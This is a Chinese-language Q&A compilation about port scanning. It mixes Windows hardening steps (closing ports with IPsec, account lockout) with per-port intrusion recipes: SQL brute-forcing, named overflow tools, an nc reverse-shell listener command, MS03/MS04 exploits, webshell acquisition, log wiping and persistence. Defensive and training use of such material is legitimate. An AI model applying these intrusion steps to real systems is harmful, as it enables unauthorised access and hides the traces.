本文目录一览:
- 1、怎样阻止别人端口扫描后 后门木马 远程入侵
- 2、流光扫描出端口后如何入侵
- 3、怎么扫描端口啊?入侵技术!
- 4、网站安全渗透测试怎么做?
- 5、如何减少服务器被端口扫描和枚举攻击
- 6、扫描到端口后如何入侵以及如何控制
怎样阻止别人端口扫描后 后门木马 远程入侵
楼上回答汗死我了。
呵呵说正经的。
可以利用关闭不常用的后门来做到。
具体参见电脑爱好者11月刊“我家大门常关着黑客进不来”一文
其实 不需要软件XP自身就可以完成你想屏蔽哪些就哪些开始-运行 输入cmd 回车输入netstat -an -o显示所有端口 和进程的关系 最好还是屏蔽一些危险的就行了下面就是建议和方法手动关闭window不常用的端口具体操作如下:默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些网络端口: 第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”,于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。 第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。 第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮,这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。 点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。 重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。 第四步,在“新规则属性”对话框中,选择“新 IP 筛选器列表”,然后点击其左边的圆圈上加一个点,表示已经激活,最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加“阻止”操作:在“新筛选器操作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”按钮。 第五步、进入“新规则属性”对话框,点击“新筛选器操作”,其左边的圆圈会加了一个点,表示已经激活,点击“关闭”按钮,关闭对话框;最后回到“新 IP安全策略属性”对话框,在“新的IP筛选器列表”左边打钩,按“确定”按钮关闭对话框。在“本地安全策略”窗口,用鼠标右击新添加的 IP 安全策略,然后选择“指派”。 于是重新启动后,电脑中上述网络端口就被关闭了。
也可利用软件!:关闭端口软件(封端口的工具)
软件大小:516 KB
软件语言:国产软件
软件类别:简体中文 / 免费软件 / 网络安全
运行环境:Win2003, WinXP, Win2000, NT, WinME
添加时间:2008-10-26 13:54:29
更新时间:2008-10-26 13:54:29
软件添加:
软件评级:
会员级别:匿名用户
下载统计:本日:3 本周:10 本月:57 总计:817
软件简介:
很多朋友不会封端口,所以发这么一款端口关闭软件出来方便大家!简单易用关闭端口软件可以自定义封杀端口的实用程序。操作简单,方便。功能强大。用户可以自行封堵一些木马病毒的高危端口。
提示:请先运行压缩包中的注册表文件,导入注册表后再打开软件哦!!
点此下载
流光扫描出端口后如何入侵
80是web服务
即浏览别人网页时别人必须打开得端口
如果入侵即是入侵一个网站,需利用该网站得漏洞
怎么扫描端口啊?入侵技术!
各种端口的入侵方法
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
11.4779端口
s扫描器 加远程控制任我行
网站安全渗透测试怎么做?
信息收集:
1、获取域名的whois信息,获取注册者邮箱姓名电话等。
2、查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。
3、查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞。
4、查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如 rsync,心脏出血,mysql,ftp,ssh弱口令等。
5、扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄漏,比如php探针。
6、google hack 进一步探测网站的信息,后台,敏感文件。
漏洞扫描:
开始检测漏洞,如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含, 远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等。
漏洞利用:
利用以上的方式拿到webshell,或者其他权限。
权限提升:
提权服务器,比如windows下mysql的udf提权。
日志清理:
结束渗透测试工作需要做的事情,抹除自己的痕迹。
总结报告及修复方案:
报告上包括:
1、对本次网站渗透测试的一个总概括,发现几个漏洞,有几个是高危的漏洞,几个中危漏洞,几个低危漏洞。
2、对漏洞进行详细的讲解,比如是什么类型的漏洞,漏洞名称,漏洞危害,漏洞具体展现方式,修复漏洞的方法。
如何减少服务器被端口扫描和枚举攻击
解决端口被扫描和枚举攻击,其实还是比较简单的,我们对服务器做几处修改,就能避免。一、修改管理员用户名默认的管理员用户名是administrator,通过日志也能看出,绝大部分的试图登录都是用这个用户名的。可以进入 开始--程序--管理攻击--本地安全策略--本地策略--安全选项里面重新命名管理员。二、设置账户锁定策略账户锁定策略是指用户在几次尝试之后都没有正确输入密码,那么该账户就会被锁定一定的时间。可以在开始--程序--管理攻击--本地安全策略--账户策略--账户锁定策略里面设置。三、修改远程端口把端口号重新设置一下,那么端口扫描的时候就扫描不到了,相对来说就比较安全了。我以前有写过一篇修改远程端口的日志,具体的修改远程端口的方法请看这里。四、使用PcAnywhere或者Real VNC如果使用了PcAnywhere或者Real VNC的话,连上去的时候,必须有一个客户端,我发现PcAnywhere对Windows 7的支持不好,在使用的时候比较不方便。Real VNC比较方便,支持Windows 7和XP等系统,建议大家可以试试。本文标签为: pcanywhere, real VNC, windows 2003, 服务器安全,端口扫描,
扫描到端口后如何入侵以及如何控制
扫描到开放端口并不意味着可以入侵,正常电脑同样开放很多端口,但如果开放一些敏感端口,你要分析那是什么服务开放的,这个服务可能存在什么漏洞
例如:80端口意味着该机存在web服务,445则是开启了共享,3389则是远程登陆,1433则是sql server
如果想从中入侵,必须知道这些端口是干什么的,目前有没有漏洞存在,如果有,一般直接用工具溢出,然后用nc监听连接,得到cmdshell,然后上传工具,设定自动启动。
如果以上的文字不能完全听懂,那么你最好在学习学习。